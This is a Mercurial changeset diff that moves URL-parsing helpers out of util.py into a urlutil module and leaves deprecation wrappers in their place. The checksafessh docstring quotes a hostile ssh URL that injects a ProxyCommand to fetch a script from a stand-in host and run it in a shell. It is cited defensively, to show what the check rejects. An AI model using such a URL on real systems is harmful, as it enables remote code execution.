Mercurial > public > mercurial-scm > hg
comparison mercurial/util.py @ 46907:ffd3e823a7e5
urlutil: extract `url` related code from `util` into the new module
The new module is a good fit for this code, and gathering the URL helpers
in one place will make it easier for them to work together later.
Differential Revision: https://phab.mercurial-scm.org/D10374
author | Pierre-Yves David <pierre-yves.david@octobus.net> |
---|---|
date | Mon, 12 Apr 2021 03:01:04 +0200 |
parents | 856820b497fc |
children | 9c3e84569071 |
comparison
equal
deleted
inserted
replaced
46906:33524c46a092 | 46907:ffd3e823a7e5 |
---|---|
26 import mmap | 26 import mmap |
27 import os | 27 import os |
28 import platform as pyplatform | 28 import platform as pyplatform |
29 import re as remod | 29 import re as remod |
30 import shutil | 30 import shutil |
31 import socket | |
32 import stat | 31 import stat |
33 import sys | 32 import sys |
34 import time | 33 import time |
35 import traceback | 34 import traceback |
36 import warnings | 35 import warnings |
55 from .utils import ( | 54 from .utils import ( |
56 compression, | 55 compression, |
57 hashutil, | 56 hashutil, |
58 procutil, | 57 procutil, |
59 stringutil, | 58 stringutil, |
59 urlutil, | |
60 ) | 60 ) |
61 | 61 |
62 if pycompat.TYPE_CHECKING: | 62 if pycompat.TYPE_CHECKING: |
63 from typing import ( | 63 from typing import ( |
64 Iterator, | 64 Iterator, |
65 List, | 65 List, |
66 Optional, | 66 Optional, |
67 Tuple, | 67 Tuple, |
68 Union, | |
69 ) | 68 ) |
70 | 69 |
71 | 70 |
72 base85 = policy.importmod('base85') | 71 base85 = policy.importmod('base85') |
73 osutil = policy.importmod('osutil') | 72 osutil = policy.importmod('osutil') |
2957 mapping[prefix_char] = prefix_char | 2956 mapping[prefix_char] = prefix_char |
2958 r = remod.compile(br'%s(%s)' % (prefix, patterns)) | 2957 r = remod.compile(br'%s(%s)' % (prefix, patterns)) |
2959 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) | 2958 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) |
2960 | 2959 |
2961 | 2960 |
2962 def getport(port): | 2961 def getport(*args, **kwargs): |
2963 # type: (Union[bytes, int]) -> int | 2962 msg = b'getport(...) moved to mercurial.utils.urlutil' |
2964 """Return the port for a given network service. | 2963 nouideprecwarn(msg, b'6.0', stacklevel=2) |
2965 | 2964 return urlutil.getport(*args, **kwargs) |
2966 If port is an integer, it's returned as is. If it's a string, it's | 2965 |
2967 looked up using socket.getservbyname(). If there's no matching | 2966 |
2968 service, error.Abort is raised. | 2967 def url(*args, **kwargs): |
2969 """ | 2968 msg = b'url(...) moved to mercurial.utils.urlutil' |
2970 try: | 2969 nouideprecwarn(msg, b'6.0', stacklevel=2) |
2971 return int(port) | 2970 return urlutil.url(*args, **kwargs) |
2972 except ValueError: | 2971 |
2973 pass | 2972 |
2974 | 2973 def hasscheme(*args, **kwargs): |
2975 try: | 2974 msg = b'hasscheme(...) moved to mercurial.utils.urlutil' |
2976 return socket.getservbyname(pycompat.sysstr(port)) | 2975 nouideprecwarn(msg, b'6.0', stacklevel=2) |
2977 except socket.error: | 2976 return urlutil.hasscheme(*args, **kwargs) |
2978 raise error.Abort( | 2977 |
2979 _(b"no port number associated with service '%s'") % port | 2978 |
2980 ) | 2979 def hasdriveletter(*args, **kwargs): |
2981 | 2980 msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil' |
2982 | 2981 nouideprecwarn(msg, b'6.0', stacklevel=2) |
2983 class url(object): | 2982 return urlutil.hasdriveletter(*args, **kwargs) |
2984 r"""Reliable URL parser. | 2983 |
2985 | 2984 |
2986 This parses URLs and provides attributes for the following | 2985 def urllocalpath(*args, **kwargs): |
2987 components: | 2986 msg = b'urllocalpath(...) moved to mercurial.utils.urlutil' |
2988 | 2987 nouideprecwarn(msg, b'6.0', stacklevel=2) |
2989 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> | 2988 return urlutil.urllocalpath(*args, **kwargs) |
2990 | 2989 |
2991 Missing components are set to None. The only exception is | 2990 |
2992 fragment, which is set to '' if present but empty. | 2991 def checksafessh(*args, **kwargs): |
2993 | 2992 msg = b'checksafessh(...) moved to mercurial.utils.urlutil' |
2994 If parsefragment is False, fragment is included in query. If | 2993 nouideprecwarn(msg, b'6.0', stacklevel=2) |
2995 parsequery is False, query is included in path. If both are | 2994 return urlutil.checksafessh(*args, **kwargs) |
2996 False, both fragment and query are included in path. | 2995 |
2997 | 2996 |
2998 See http://www.ietf.org/rfc/rfc2396.txt for more information. | 2997 def hidepassword(*args, **kwargs): |
2999 | 2998 msg = b'hidepassword(...) moved to mercurial.utils.urlutil' |
3000 Note that for backward compatibility reasons, bundle URLs do not | 2999 nouideprecwarn(msg, b'6.0', stacklevel=2) |
3001 take host names. That means 'bundle://../' has a path of '../'. | 3000 return urlutil.hidepassword(*args, **kwargs) |
3002 | 3001 |
3003 Examples: | 3002 |
3004 | 3003 def removeauth(*args, **kwargs): |
3005 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') | 3004 msg = b'removeauth(...) moved to mercurial.utils.urlutil' |
3006 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> | 3005 nouideprecwarn(msg, b'6.0', stacklevel=2) |
3007 >>> url(b'ssh://[::1]:2200//home/joe/repo') | 3006 return urlutil.removeauth(*args, **kwargs) |
3008 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> | |
3009 >>> url(b'file:///home/joe/repo') | |
3010 <url scheme: 'file', path: '/home/joe/repo'> | |
3011 >>> url(b'file:///c:/temp/foo/') | |
3012 <url scheme: 'file', path: 'c:/temp/foo/'> | |
3013 >>> url(b'bundle:foo') | |
3014 <url scheme: 'bundle', path: 'foo'> | |
3015 >>> url(b'bundle://../foo') | |
3016 <url scheme: 'bundle', path: '../foo'> | |
3017 >>> url(br'c:\foo\bar') | |
3018 <url path: 'c:\\foo\\bar'> | |
3019 >>> url(br'\\blah\blah\blah') | |
3020 <url path: '\\\\blah\\blah\\blah'> | |
3021 >>> url(br'\\blah\blah\blah#baz') | |
3022 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> | |
3023 >>> url(br'file:///C:\users\me') | |
3024 <url scheme: 'file', path: 'C:\\users\\me'> | |
3025 | |
3026 Authentication credentials: | |
3027 | |
3028 >>> url(b'ssh://joe:xyz@x/repo') | |
3029 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> | |
3030 >>> url(b'ssh://joe@x/repo') | |
3031 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> | |
3032 | |
3033 Query strings and fragments: | |
3034 | |
3035 >>> url(b'http://host/a?b#c') | |
3036 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> | |
3037 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) | |
3038 <url scheme: 'http', host: 'host', path: 'a?b#c'> | |
3039 | |
3040 Empty path: | |
3041 | |
3042 >>> url(b'') | |
3043 <url path: ''> | |
3044 >>> url(b'#a') | |
3045 <url path: '', fragment: 'a'> | |
3046 >>> url(b'http://host/') | |
3047 <url scheme: 'http', host: 'host', path: ''> | |
3048 >>> url(b'http://host/#a') | |
3049 <url scheme: 'http', host: 'host', path: '', fragment: 'a'> | |
3050 | |
3051 Only scheme: | |
3052 | |
3053 >>> url(b'http:') | |
3054 <url scheme: 'http'> | |
3055 """ | |
3056 | |
3057 _safechars = b"!~*'()+" | |
3058 _safepchars = b"/!~*'()+:\\" | |
3059 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match | |
3060 | |
3061 def __init__(self, path, parsequery=True, parsefragment=True): | |
3062 # type: (bytes, bool, bool) -> None | |
3063 # We slowly chomp away at path until we have only the path left | |
3064 self.scheme = self.user = self.passwd = self.host = None | |
3065 self.port = self.path = self.query = self.fragment = None | |
3066 self._localpath = True | |
3067 self._hostport = b'' | |
3068 self._origpath = path | |
3069 | |
3070 if parsefragment and b'#' in path: | |
3071 path, self.fragment = path.split(b'#', 1) | |
3072 | |
3073 # special case for Windows drive letters and UNC paths | |
3074 if hasdriveletter(path) or path.startswith(b'\\\\'): | |
3075 self.path = path | |
3076 return | |
3077 | |
3078 # For compatibility reasons, we can't handle bundle paths as | |
3079 # normal URLS | |
3080 if path.startswith(b'bundle:'): | |
3081 self.scheme = b'bundle' | |
3082 path = path[7:] | |
3083 if path.startswith(b'//'): | |
3084 path = path[2:] | |
3085 self.path = path | |
3086 return | |
3087 | |
3088 if self._matchscheme(path): | |
3089 parts = path.split(b':', 1) | |
3090 if parts[0]: | |
3091 self.scheme, path = parts | |
3092 self._localpath = False | |
3093 | |
3094 if not path: | |
3095 path = None | |
3096 if self._localpath: | |
3097 self.path = b'' | |
3098 return | |
3099 else: | |
3100 if self._localpath: | |
3101 self.path = path | |
3102 return | |
3103 | |
3104 if parsequery and b'?' in path: | |
3105 path, self.query = path.split(b'?', 1) | |
3106 if not path: | |
3107 path = None | |
3108 if not self.query: | |
3109 self.query = None | |
3110 | |
3111 # // is required to specify a host/authority | |
3112 if path and path.startswith(b'//'): | |
3113 parts = path[2:].split(b'/', 1) | |
3114 if len(parts) > 1: | |
3115 self.host, path = parts | |
3116 else: | |
3117 self.host = parts[0] | |
3118 path = None | |
3119 if not self.host: | |
3120 self.host = None | |
3121 # path of file:///d is /d | |
3122 # path of file:///d:/ is d:/, not /d:/ | |
3123 if path and not hasdriveletter(path): | |
3124 path = b'/' + path | |
3125 | |
3126 if self.host and b'@' in self.host: | |
3127 self.user, self.host = self.host.rsplit(b'@', 1) | |
3128 if b':' in self.user: | |
3129 self.user, self.passwd = self.user.split(b':', 1) | |
3130 if not self.host: | |
3131 self.host = None | |
3132 | |
3133 # Don't split on colons in IPv6 addresses without ports | |
3134 if ( | |
3135 self.host | |
3136 and b':' in self.host | |
3137 and not ( | |
3138 self.host.startswith(b'[') and self.host.endswith(b']') | |
3139 ) | |
3140 ): | |
3141 self._hostport = self.host | |
3142 self.host, self.port = self.host.rsplit(b':', 1) | |
3143 if not self.host: | |
3144 self.host = None | |
3145 | |
3146 if ( | |
3147 self.host | |
3148 and self.scheme == b'file' | |
3149 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') | |
3150 ): | |
3151 raise error.Abort( | |
3152 _(b'file:// URLs can only refer to localhost') | |
3153 ) | |
3154 | |
3155 self.path = path | |
3156 | |
3157 # leave the query string escaped | |
3158 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): | |
3159 v = getattr(self, a) | |
3160 if v is not None: | |
3161 setattr(self, a, urlreq.unquote(v)) | |
3162 | |
3163 def copy(self): | |
3164 u = url(b'temporary useless value') | |
3165 u.path = self.path | |
3166 u.scheme = self.scheme | |
3167 u.user = self.user | |
3168 u.passwd = self.passwd | |
3169 u.host = self.host | |
3170 u.path = self.path | |
3171 u.query = self.query | |
3172 u.fragment = self.fragment | |
3173 u._localpath = self._localpath | |
3174 u._hostport = self._hostport | |
3175 u._origpath = self._origpath | |
3176 return u | |
3177 | |
3178 @encoding.strmethod | |
3179 def __repr__(self): | |
3180 attrs = [] | |
3181 for a in ( | |
3182 b'scheme', | |
3183 b'user', | |
3184 b'passwd', | |
3185 b'host', | |
3186 b'port', | |
3187 b'path', | |
3188 b'query', | |
3189 b'fragment', | |
3190 ): | |
3191 v = getattr(self, a) | |
3192 if v is not None: | |
3193 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) | |
3194 return b'<url %s>' % b', '.join(attrs) | |
3195 | |
3196 def __bytes__(self): | |
3197 r"""Join the URL's components back into a URL string. | |
3198 | |
3199 Examples: | |
3200 | |
3201 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) | |
3202 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' | |
3203 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) | |
3204 'http://user:pw@host:80/?foo=bar&baz=42' | |
3205 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) | |
3206 'http://user:pw@host:80/?foo=bar%3dbaz' | |
3207 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) | |
3208 'ssh://user:pw@[::1]:2200//home/joe#' | |
3209 >>> bytes(url(b'http://localhost:80//')) | |
3210 'http://localhost:80//' | |
3211 >>> bytes(url(b'http://localhost:80/')) | |
3212 'http://localhost:80/' | |
3213 >>> bytes(url(b'http://localhost:80')) | |
3214 'http://localhost:80/' | |
3215 >>> bytes(url(b'bundle:foo')) | |
3216 'bundle:foo' | |
3217 >>> bytes(url(b'bundle://../foo')) | |
3218 'bundle:../foo' | |
3219 >>> bytes(url(b'path')) | |
3220 'path' | |
3221 >>> bytes(url(b'file:///tmp/foo/bar')) | |
3222 'file:///tmp/foo/bar' | |
3223 >>> bytes(url(b'file:///c:/tmp/foo/bar')) | |
3224 'file:///c:/tmp/foo/bar' | |
3225 >>> print(url(br'bundle:foo\bar')) | |
3226 bundle:foo\bar | |
3227 >>> print(url(br'file:///D:\data\hg')) | |
3228 file:///D:\data\hg | |
3229 """ | |
3230 if self._localpath: | |
3231 s = self.path | |
3232 if self.scheme == b'bundle': | |
3233 s = b'bundle:' + s | |
3234 if self.fragment: | |
3235 s += b'#' + self.fragment | |
3236 return s | |
3237 | |
3238 s = self.scheme + b':' | |
3239 if self.user or self.passwd or self.host: | |
3240 s += b'//' | |
3241 elif self.scheme and ( | |
3242 not self.path | |
3243 or self.path.startswith(b'/') | |
3244 or hasdriveletter(self.path) | |
3245 ): | |
3246 s += b'//' | |
3247 if hasdriveletter(self.path): | |
3248 s += b'/' | |
3249 if self.user: | |
3250 s += urlreq.quote(self.user, safe=self._safechars) | |
3251 if self.passwd: | |
3252 s += b':' + urlreq.quote(self.passwd, safe=self._safechars) | |
3253 if self.user or self.passwd: | |
3254 s += b'@' | |
3255 if self.host: | |
3256 if not (self.host.startswith(b'[') and self.host.endswith(b']')): | |
3257 s += urlreq.quote(self.host) | |
3258 else: | |
3259 s += self.host | |
3260 if self.port: | |
3261 s += b':' + urlreq.quote(self.port) | |
3262 if self.host: | |
3263 s += b'/' | |
3264 if self.path: | |
3265 # TODO: similar to the query string, we should not unescape the | |
3266 # path when we store it, the path might contain '%2f' = '/', | |
3267 # which we should *not* escape. | |
3268 s += urlreq.quote(self.path, safe=self._safepchars) | |
3269 if self.query: | |
3270 # we store the query in escaped form. | |
3271 s += b'?' + self.query | |
3272 if self.fragment is not None: | |
3273 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) | |
3274 return s | |
3275 | |
3276 __str__ = encoding.strmethod(__bytes__) | |
3277 | |
3278 def authinfo(self): | |
3279 user, passwd = self.user, self.passwd | |
3280 try: | |
3281 self.user, self.passwd = None, None | |
3282 s = bytes(self) | |
3283 finally: | |
3284 self.user, self.passwd = user, passwd | |
3285 if not self.user: | |
3286 return (s, None) | |
3287 # authinfo[1] is passed to urllib2 password manager, and its | |
3288 # URIs must not contain credentials. The host is passed in the | |
3289 # URIs list because Python < 2.4.3 uses only that to search for | |
3290 # a password. | |
3291 return (s, (None, (s, self.host), self.user, self.passwd or b'')) | |
3292 | |
3293 def isabs(self): | |
3294 if self.scheme and self.scheme != b'file': | |
3295 return True # remote URL | |
3296 if hasdriveletter(self.path): | |
3297 return True # absolute for our purposes - can't be joined() | |
3298 if self.path.startswith(br'\\'): | |
3299 return True # Windows UNC path | |
3300 if self.path.startswith(b'/'): | |
3301 return True # POSIX-style | |
3302 return False | |
3303 | |
3304 def localpath(self): | |
3305 # type: () -> bytes | |
3306 if self.scheme == b'file' or self.scheme == b'bundle': | |
3307 path = self.path or b'/' | |
3308 # For Windows, we need to promote hosts containing drive | |
3309 # letters to paths with drive letters. | |
3310 if hasdriveletter(self._hostport): | |
3311 path = self._hostport + b'/' + self.path | |
3312 elif ( | |
3313 self.host is not None and self.path and not hasdriveletter(path) | |
3314 ): | |
3315 path = b'/' + path | |
3316 return path | |
3317 return self._origpath | |
3318 | |
3319 def islocal(self): | |
3320 '''whether localpath will return something that posixfile can open''' | |
3321 return ( | |
3322 not self.scheme | |
3323 or self.scheme == b'file' | |
3324 or self.scheme == b'bundle' | |
3325 ) | |
3326 | |
3327 | |
3328 def hasscheme(path): | |
3329 # type: (bytes) -> bool | |
3330 return bool(url(path).scheme) # cast to help pytype | |
3331 | |
3332 | |
3333 def hasdriveletter(path): | |
3334 # type: (bytes) -> bool | |
3335 return bool(path) and path[1:2] == b':' and path[0:1].isalpha() | |
3336 | |
3337 | |
3338 def urllocalpath(path): | |
3339 # type: (bytes) -> bytes | |
3340 return url(path, parsequery=False, parsefragment=False).localpath() | |
3341 | |
3342 | |
3343 def checksafessh(path): | |
3344 # type: (bytes) -> None | |
3345 """check if a path / url is a potentially unsafe ssh exploit (SEC) | |
3346 | |
3347 This is a sanity check for ssh urls. ssh will parse the first item as | |
3348 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. | |
3349 Let's prevent these potentially exploited urls entirely and warn the | |
3350 user. | |
3351 | |
3352 Raises an error.Abort when the url is unsafe. | |
3353 """ | |
3354 path = urlreq.unquote(path) | |
3355 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): | |
3356 raise error.Abort( | |
3357 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) | |
3358 ) | |
3359 | |
3360 | |
3361 def hidepassword(u): | |
3362 # type: (bytes) -> bytes | |
3363 '''hide user credential in a url string''' | |
3364 u = url(u) | |
3365 if u.passwd: | |
3366 u.passwd = b'***' | |
3367 return bytes(u) | |
3368 | |
3369 | |
3370 def removeauth(u): | |
3371 # type: (bytes) -> bytes | |
3372 '''remove all authentication information from a url string''' | |
3373 u = url(u) | |
3374 u.user = u.passwd = None | |
3375 return bytes(u) | |
3376 | 3007 |
3377 | 3008 |
3378 timecount = unitcountfn( | 3009 timecount = unitcountfn( |
3379 (1, 1e3, _(b'%.0f s')), | 3010 (1, 1e3, _(b'%.0f s')), |
3380 (100, 1, _(b'%.1f s')), | 3011 (100, 1, _(b'%.1f s')), |